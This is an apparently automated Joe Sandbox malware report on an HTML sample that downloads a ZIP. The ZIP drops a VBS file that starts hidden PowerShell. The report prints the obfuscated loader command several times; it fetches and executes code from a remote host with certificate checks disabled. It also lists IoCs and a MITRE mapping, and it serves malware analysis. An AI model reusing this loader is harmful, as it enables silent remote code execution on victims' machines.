Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\wscript.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: Window Recorder; Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\unarchiver.exe; File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
Source: Binary string: Google.Widevine.CDM.dll.pdb source: Google.Widevine.CDM.dll.0.dr

Data Obfuscation

Source: C:\Windows\SysWOW64\wscript.exe; Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($KSJQTmC = $('{5}{4}{1}' -f $('uxhxeilT'.ToCharArray())); $((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^^^|%{[char]($_/2)})-join'') ^^^| ^^^&($KSJQTmC) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $($KSJQTmC = $('{5}{4}{1}' -f $('uxhxeilT'.ToCharArray())); $((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^|%{[char]($_/2)})-join'') ^| ^&($KSJQTmC) "
Source: Google.Widevine.CDM.dll.0.dr | Static PE information: section name: .00cfg
Source: Google.Widevine.CDM.dll.0.dr | Static PE information: section name: .gxfg
Source: Google.Widevine.CDM.dll.0.dr | Static PE information: section name: .retplne
Source: Google.Widevine.CDM.dll.0.dr | Static PE information: section name: .voltbl
Source: Google.Widevine.CDM.dll.0.dr | Static PE information: section name: _RDATA
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_316616745\Google.Widevine.CDM.dll
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_1443407132\LICENSE.txt
Source: C:\Windows\SysWOW64\unarchiver.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exe | Memory allocated: 1000000 memory reserve | memory write watch
Source: C:\Windows\SysWOW64\unarchiver.exe | Memory allocated: 2AD0000 memory reserve | memory write watch
Source: C:\Windows\SysWOW64\unarchiver.exe | Memory allocated: 4AD0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\unarchiver.exe | Window / User API: threadDelayed 496
Source: C:\Windows\SysWOW64\unarchiver.exe | Window / User API: threadDelayed 9502
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2990
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6691
Source: C:\Windows\SysWOW64\unarchiver.exe TID: 6808 | Thread sleep count: 496 > 30
Source: C:\Windows\SysWOW64\unarchiver.exe TID: 6808 | Thread sleep time: -248000s >= -30000s
Source: C:\Windows\SysWOW64\unarchiver.exe TID: 6808 | Thread sleep count: 9502 > 30
Source: C:\Windows\SysWOW64\unarchiver.exe TID: 6808 | Thread sleep time: -4751000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7160 | Thread sleep count: 2990 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7164 | Thread sleep count: 6691 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6248 | Thread sleep time: -22136092888451448s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\unarchiver.exe | Code function: 3_2_00E0B1D6 GetSystemInfo,3_2_00E0B1D6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: wscript.exe, 00000008.00000002.3600888684.000000000613E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.3599216434.0000000003182000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000008.00000002.3599216434.0000000003182000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\unarchiver.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\wscript.exe | Network Connect: 54.39.156.32 443
Source: C:\Windows\SysWOW64\unarchiver.exe | Process created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p" "C:\Users\user\Downloads\CfF7MWq7aG.zip"
Source: C:\Windows\SysWOW64\unarchiver.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs"
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($KSJQTmC = $('{5}{4}{1}' -f $('uxhxeilT'.ToCharArray())); $((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^^^|%{[char]($_/2)})-join'') ^^^| ^^^&($KSJQTmC) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $($KSJQTmC = $('{5}{4}{1}' -f $('uxhxeilT'.ToCharArray())); $((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^|%{[char]($_/2)})-join'') ^| ^&($KSJQTmC) "Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\unarchiver.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK Matrix (one line per tactic; digits preceding a technique are the report's signature-count badges):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: 111 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 11 Command and Scripting Interpreter; 1 Exploitation for Client Execution; 1 PowerShell; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: 111 Scripting; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: 111 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: 21 Masquerading; 1 Disable or Modify Tools; 31 Virtualization/Sandbox Evasion; 111 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 DLL Side-Loading; 1 File Deletion
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 1 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 13 System Information Discovery; Remote System Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: 1 Encrypted Channel; 1 Non-Standard Port; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 3 Application Layer Protocol; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Behavior Graph ID: 1607145 | Sample: CfF7MWq7aG | Start date: 05/02/2025 | Architecture: WINDOWS | Score: 92

Process tree with the graph's DNS/IP, dropped-file and signature annotations (numbers after a process name are the graph's created-file and created-registry-value counts):

  Sample start
    DNS/IP: s4.histats.com; host85500.info
    Signatures: Found suspicious ZIP file; Detected javascript redirector / loader; Downloads suspicious files via Chrome; 5 other signatures
    started: chrome.exe 60
  chrome.exe 60
    DNS/IP: 192.168.2.4, 138, 15322, 443 unknown unknown; 192.168.2.24 unknown unknown; 239.255.255.250 unknown Reserved
    Dropped: C:\Users\user\...\CfF7MWq7aG.zip (copy), Zip; C:\Windows\...\Google.Widevine.CDM.dll, PE32+
    started: unarchiver.exe 4; chrome.exe
  unarchiver.exe 4
    started: cmd.exe 2 2; 7za.exe 2
  chrome.exe (child of chrome.exe 60)
    DNS/IP: 54.39.156.32, 443, 49739, 49748 OVHFR Canada; host85500.info 45.93.9.167, 15322, 49740, 49741 VMAGE-ASRU Russian Federation; 3 other IPs or domains
  cmd.exe 2 2
    Signatures: Wscript starts Powershell (via cmd or directly); Obfuscated command line found
    started: wscript.exe 14; conhost.exe
  7za.exe 2
    Dropped: C:\Users\user\AppData\...\2025010453906.vbs, ASCII
    started: conhost.exe
  wscript.exe 14
    Signatures: System process connects to network (likely due to code injection or exploit); Wscript starts Powershell (via cmd or directly); Obfuscated command line found; 2 other signatures
    started: cmd.exe 1
  cmd.exe 1
    Signatures: Wscript starts Powershell (via cmd or directly); Obfuscated command line found
    started: powershell.exe 15 17; conhost.exe; cmd.exe 1

Antivirus detection for the sample:

Source | Detection | Scanner | Label | Link
CfF7MWq7aG.html | 0% | ReversingLabs | |
CfF7MWq7aG.html | 0% | Virustotal | | Browse
Antivirus detection for dropped files:

Source | Detection | Scanner | Label | Link
C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_316616745\Google.Widevine.CDM.dll | 0% | ReversingLabs | |
No Antivirus matches
No Antivirus matches
Antivirus detection for URLs:

Source | Detection | Scanner | Label | Link
https://emv-qr.googleplex.com/. | 0% | Avira URL Cloud | safe |
https://www.motorola.com.br/checkout/#/payment | 0% | Avira URL Cloud | safe |
https://www.cobasi.com.br/checkout/review. | 0% | Avira URL Cloud | safe |
https://checkout-new.dafiti.com.br/success/index.html. | 0% | Avira URL Cloud | safe |
https://comprasegura.olx.com.br/pedidos/. | 0% | Avira URL Cloud | safe |
https://www.paodeacucar.com/checkout. | 0% | Avira URL Cloud | safe |
https://www.zzmall.com.br/checkout/order-confirmation/. | 0% | Avira URL Cloud | safe |
https://www.hurb.com/br/pay/checkout/. | 0% | Avira URL Cloud | safe |
https://comprasegura.olx.com.br/ | 0% | Avira URL Cloud | safe |


Contacted domains:

Name | IP | Active | Malicious | Antivirus Detection | Reputation
host85500.info | 45.93.9.167 | true | false | | unknown
s4.histats.com | 142.4.219.198 | true | false | | high
www.google.com | 142.250.186.36 | true | false | | high
_15322._https.host85500.info | unknown | unknown | false | | unknown
Contacted public IPs:

IP | Domain | Country | ASN | ASN Name | Malicious
142.250.186.36 | www.google.com | United States | 15169 | GOOGLEUS | false
54.39.156.32 | unknown | Canada | 16276 | OVHFR | true
142.4.219.198 | s4.histats.com | Canada | 16276 | OVHFR | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
45.93.9.167 | host85500.info | Russian Federation | 44676 | VMAGE-ASRU | false
Contacted private IPs:

IP
192.168.2.4
192.168.2.24
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1607145
Start date and time: 2025-02-05 07:55:35 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 41s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowshtmlcookbook.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: CfF7MWq7aG.html
(renamed file extension from none to html, renamed because original name is a hash value)
Original Sample Name: 9182073a7541a8d2db5f94d7a980d70a9ce499c9ec55395fa968ecc65c828dfc
Detection: MAL
Classification: mal92.phis.expl.evad.winHTML@50/41@15/7
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 45
• Number of non-executed functions: 0
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 172.217.23.99, 142.250.185.142, 173.194.76.84, 172.217.16.206, 142.250.184.238, 142.250.185.238, 172.217.18.10, 216.58.212.170, 172.217.16.202, 142.250.74.202, 142.250.184.234, 142.250.185.106, 216.58.206.42, 142.250.185.170, 142.250.185.202, 142.250.185.74, 142.250.185.234, 216.58.206.74, 142.250.185.138, 142.250.186.42, 142.250.181.234, 216.58.212.138, 199.232.210.172, 2.23.77.188, 216.58.212.174, 142.250.186.46, 142.250.186.110, 216.58.206.78, 142.250.186.142, 142.250.181.227, 34.104.35.123, 142.250.185.174, 142.250.186.174, 216.58.206.67, 142.250.185.110, 2.18.97.153, 20.12.23.50, 13.107.246.44
• Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com, optimizationguide-pa.googleapis.com
• Execution Graph export aborted for target wscript.exe, PID 6884 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
01:56:45 | API Interceptor | 43x Sleep call for process: powershell.exe modified
01:57:08 | API Interceptor | 3757209x Sleep call for process: unarchiver.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
142.4.219.198 | http://www.meherald.com.au/ | Get hash | malicious | Unknown | Browse | • sstatic1.histats.com/0.gif?4786559&101
239.255.255.250 | http://80.64.30.238/evix.xll | Get hash | malicious | Unknown | Browse
239.255.255.250 | https://westallisheating.com/ | Get hash | malicious | CAPTCHA Scam ClickFix | Browse
239.255.255.250 | https://webmaix.luxanday.com/auth.html?sync=info@unanigeria.org | Get hash | malicious | Unknown | Browse
239.255.255.250 | https://harmonyagro.com.br/.well-known/vvx/dloasayudaenespanol-labor@maryland.gov | Get hash | malicious | HTMLPhisher | Browse
239.255.255.250 | Jjswaste Pr0ject.svg | Get hash | malicious | Unknown | Browse
239.255.255.250 | https://www.flipsnack.com/B77C9F5569B/sys-mac-automation-engineering-pte-ltd/full-view.html | Get hash | malicious | Unknown | Browse
239.255.255.250 | https://app.powerbi.com/view?r=eyJrIjoiMDA2ZDU1NjAtYWIzNS00NWI5LThmZjQtZGNkNzUzYjk3YWJhIiwidCI6IjE1MWMxNjZlLWM3ZWEtNGI1ZC1hMjQ3LTNkMTAyNTEzY2IwMyJ9 | Get hash | malicious | Unknown | Browse
239.255.255.250 | https://app.getbeamer.com/product7064/en/american-tradeshow-services-document-info-A6xyYY2P | Get hash | malicious | HTMLPhisher | Browse
239.255.255.250 | http://kb.xilitharne.ru | Get hash | malicious | Unknown | Browse
239.255.255.250 | https://exclusivasarteca.com/paypay-login | Get hash | malicious | Unknown | Browse
54.39.156.32 | https://templates.rjuuc.edu.np | Get hash | malicious | Unknown | Browse
54.39.156.32 | http://jinoodle-polopol.b-cdn.net/ | Get hash | malicious | TechSupportScam | Browse
54.39.156.32 | https://suman006723213.github.io/garena.reward.ff/ | Get hash | malicious | HTMLPhisher | Browse
54.39.156.32 | https://feji.us/m266he | Get hash | malicious | Unknown | Browse
54.39.156.32 | https://l.facebook.com/l.php?u=https%3A%2F%2Fusapress.info%2Finside-the-last-words-of-dan-haggerty-aka-grizzly-adams-and-why-he-had-to-pull-the-plug-on-his-wife-of-20-years%2F%3Ffbclid%3DIwZXh0bgNhZW0CMTAAAR0r3IVxCUPtQPPqP5Ce0_adoAsiHgG3Oy1cYDq3k1JXBIrTGLtjToxlazM_aem_q02YsKkKY0QB_fm5suzUDw&h=AT1Xo_CkNlagO29_sds-m5zdTBZ6-H70m0J__7wjjmSNinwNGqBfRUFK3cH2zXJWNO7msrJPRkNulrkTmUCLkRNMcfCJTNK-cs4SfUQyRy7nw3vP1DNmFisBvlttaen8fHfi-N3lXN_BGQgdBw&__tn__=R%5D-R&c%5B0%5D=AT3euz91upHKeMVK8p24ktUFKClJ0GKt_3lJnV9tGakx0Tro3u7Ymk1z4tOG4eBZxcuD-Ny10eAla4iUyfdG04Fh4GryHwAMuELGG4dQctfWKiu4mfB-eLJ8Qktnq0ptzD_TaZEPEMHQnvP4W65jDpc-XBmWlMSmaRM-2soPhaPGYAODWegqP8h47S90Q2hmwQvQgUDdb35OgV1duzzqudMAyOk7e8E7mfpnrlwhIvWwUkK53AUNuPTqYkQ | Get hash | malicious | Unknown | Browse
54.39.156.32 | https://ole798.com/ | Get hash | malicious | Unknown | Browse
54.39.156.32 | http://stream.crichd.vip/update/sscricket.php | Get hash | malicious | Unknown | Browse
54.39.156.32 | odbior_1000731867755U.vbs | Get hash | malicious | Unknown | Browse
54.39.156.32 | http://palestinehelpcentre.blogspot.com/ | Get hash | malicious | HTMLPhisher | Browse
54.39.156.32 | https://santemur.click/call/jqtfbrsyzb | Get hash | malicious | Unknown | Browse
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
s4.histats.com | https://getwellslogsnowonline.vercel.app/ | Get hash | malicious | Unknown | Browse | • 149.56.240.132
s4.histats.com | https://fooofooofooo.b-cdn.net/ | Get hash | malicious | TechSupportScam | Browse | • 149.56.240.127
s4.histats.com | El3cE5jq1L.pdf | Get hash | malicious | Unknown | Browse | • 149.56.240.129
s4.histats.com | http://home45insurance.blogspot.com | Get hash | malicious | Unknown | Browse | • 54.39.128.162
s4.histats.com | http://jinoodle-polopol.b-cdn.net/ | Get hash | malicious | TechSupportScam | Browse | • 149.56.240.27
s4.histats.com | https://eightdays-pdfnow.b-cdn.net/ | Get hash | malicious | TechSupportScam | Browse | • 149.56.240.130
s4.histats.com | http://nomads-primes-pdfs.b-cdn.net/ | Get hash | malicious | TechSupportScam | Browse | • 149.56.240.27
s4.histats.com | https://suman006723213.github.io/garena.reward.ff/ | Get hash | malicious | HTMLPhisher | Browse | • 149.56.240.27
s4.histats.com | https://199.188.109.181 | Get hash | malicious | Unknown | Browse | • 158.69.254.144
s4.histats.com | https://alluc.co/watch-movies/passengers.html | Get hash | malicious | Unknown | Browse | • 149.56.240.127
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
OVHFR | https://westallisheating.com/ | Get hash | malicious | CAPTCHA Scam ClickFix | Browse | • 51.81.55.251
OVHFR | Bank Slip pdf.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | • 54.39.129.84
OVHFR | https://eventmidasbuyz.merchats.com/ | Get hash | malicious | HTMLPhisher | Browse | • 46.105.222.82
OVHFR | res.arm5.elf | Get hash | malicious | Unknown | Browse | • 149.60.1.98
OVHFR | res.spc.elf | Get hash | malicious | Unknown | Browse | • 188.165.189.140
OVHFR | https://je.engl6.shop/webro-DPD-notificare/ | Get hash | malicious | Unknown | Browse | • 54.38.113.8
OVHFR | https://tt.vg/notificareDPD02 | Get hash | malicious | Unknown | Browse | • 51.178.195.217
OVHFR | res.mips.elf | Get hash | malicious | Unknown | Browse | • 176.31.225.194
OVHFR | https://eminentpr.com/?nnt=dG9ueWEuZ3JlZW5sZXlAc3BvbmdlLWN1c2hpb24uY29tLS0tLUNoYWQgU2ltbW9ucw== | Get hash | malicious | HTMLPhisher | Browse | • 51.222.174.97
OVHFR | dokument_20250130_0011.docx.doc | Get hash | malicious | Unknown | Browse | • 146.59.116.84
VMAGE-ASRU | svc2.exe | Get hash | malicious | SmokeLoader | Browse | • 2.59.163.71
